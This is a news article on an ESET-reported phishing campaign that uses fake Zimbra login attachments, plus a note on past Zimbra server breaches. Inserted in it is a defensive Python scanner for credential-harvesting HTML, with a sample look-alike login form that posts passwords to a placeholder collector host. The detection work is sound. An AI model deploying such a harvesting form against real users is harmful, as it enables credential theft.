Hackers Reportedly Steal Accounts of Zimbra Users

New reports claim that an unidentified actor is currently sending convincing phishing emails through Zimbra accounts in order to steal the credentials of other Zimbra users.

Hackers Steal Accounts of Zimbra Users

A new phishing campaign targeting users of Zimbra Collaboration email servers has been spotted, and the researchers following it say it is proving quite successful.

Zimbra Collaboration is a collaborative suite that includes an email server and a web client.

According to researchers from ESET, cybercriminals began sending the phishing emails to victims at random in April 2023, in a bid to obtain login credentials for the service.

In these emails, the attackers pose as the administrator of the victim's organization and tell the recipient that their email server is about to be updated. The update, the message claims, will make the mailbox inaccessible and could possibly result in termination.

How the Threat Actors Acted

To avoid this, the victim is urged to open the HTML file attached to the email and review the instructions found there.

The attachment contains no instructions at all. Instead, it displays a fake Zimbra login page with the username already filled in, inviting the user to type in their password. The submitted credentials are then sent to the attacker's server via an HTTPS POST request.
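A defender can screen HTML attachments for exactly this pattern: a form that contains a password field, posts to a host other than the organization's own webmail, and arrives with the username prefilled. The following Python scanner is an added example written for this article, not code from ESET or the Zimbra project; the trusted-host allowlist and both sample attachments are constructed assumptions.

```python
"""Heuristic scanner for HTML email attachments that look like credential-harvesting pages.

Added example, not part of the original article or ESET's research. It flags a
<form> that contains a password field and posts to a host outside an allowlist
of the organization's own webmail hosts (the allowlist below is an assumption).
"""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumption: the host(s) on which the organization's real Zimbra web client lives.
TRUSTED_HOSTS = {"mail.example.org"}


class FormScanner(HTMLParser):
    """Collects every <form> in the document together with the inputs it contains."""

    def __init__(self):
        super().__init__()
        self.forms = []        # one dict per <form> encountered
        self._current = None   # the form currently being parsed, if any

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current = {
                "action": a.get("action") or "",
                "method": (a.get("method") or "get").lower(),
                "has_password": False,
                "prefilled_user": None,
            }
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            itype = (a.get("type") or "text").lower()
            if itype == "password":
                self._current["has_password"] = True
            elif itype in ("text", "email") and a.get("value"):
                # A text/email field shipped with a value is the "prefilled username" trick.
                self._current["prefilled_user"] = a["value"]

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def scan_attachment(html: str):
    """Return a list of findings (one string per suspicious form); empty list if nothing was flagged."""
    parser = FormScanner()
    parser.feed(html)
    findings = []
    for form in parser.forms:
        if not form["has_password"]:
            continue  # only password-collecting forms are of interest here
        host = urlparse(form["action"]).hostname or ""
        reasons = []
        if host and host not in TRUSTED_HOSTS:
            reasons.append(f"password form posts to external host {host}")
        if form["prefilled_user"]:
            reasons.append(f"username prefilled as {form['prefilled_user']}")
        if reasons:
            findings.append("; ".join(reasons))
    return findings


# Constructed sample: a look-alike login form posting to a placeholder collector host.
SAMPLE_PHISH = """
<html><body>
<form method="post" action="https://collector.invalid/login">
  <input type="email" name="username" value="alice@example.org">
  <input type="password" name="password">
  <input type="submit" value="Sign in">
</form>
</body></html>
"""

# Constructed sample: a form that posts to the organization's own webmail host.
SAMPLE_BENIGN = """
<form method="post" action="https://mail.example.org/">
  <input type="text" name="username">
  <input type="password" name="password">
</form>
"""

if __name__ == "__main__":
    for label, doc in (("phish", SAMPLE_PHISH), ("benign", SAMPLE_BENIGN)):
        print(label, scan_attachment(doc))
```

The check is deliberately simple so it can run inside a mail gateway's attachment pipeline; JavaScript-built forms or obfuscated markup would need a rendered-DOM pass, which this parser does not attempt.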

ESET further noted that in most cases the attackers used previously compromised admin accounts to create new accounts on the Zimbra servers purely for distributing the phishing emails, which adds to the perceived legitimacy of the messages. The researchers say the campaign is hardly sophisticated, but its results are nonetheless "impressive".

Zimbra Collaboration Email Servers Commonly Targeted By Cybercriminals

According to BleepingComputer, Zimbra Collaboration email servers are "commonly" targeted by cybercriminals, who use them for cyber espionage by collecting internal company communications. They also often serve as an initial point of breach from which attackers move laterally through the targeted network.

Other Times Zimbra Email Servers Were Hacked

One such case occurred earlier this year, when a Russian threat actor reportedly exploited a vulnerability in the software (CVE-2022-27926) to snoop on emails belonging to organizations aligned with the North Atlantic Treaty Organization (NATO). Governments, diplomats, and military personnel were also targeted, the publication stated.

Another attack took place in October 2022, when over 900 servers were hacked through a Zimbra zero-day. Kaspersky described the flaw as a remote code execution vulnerability that allowed threat actors to send an email with a malicious file that deployed a webshell on the Zimbra server without triggering an antivirus alarm. It is now tracked as CVE-2022-41352, and some researchers claim as many as 1,600 servers were compromised as a result of the incident.
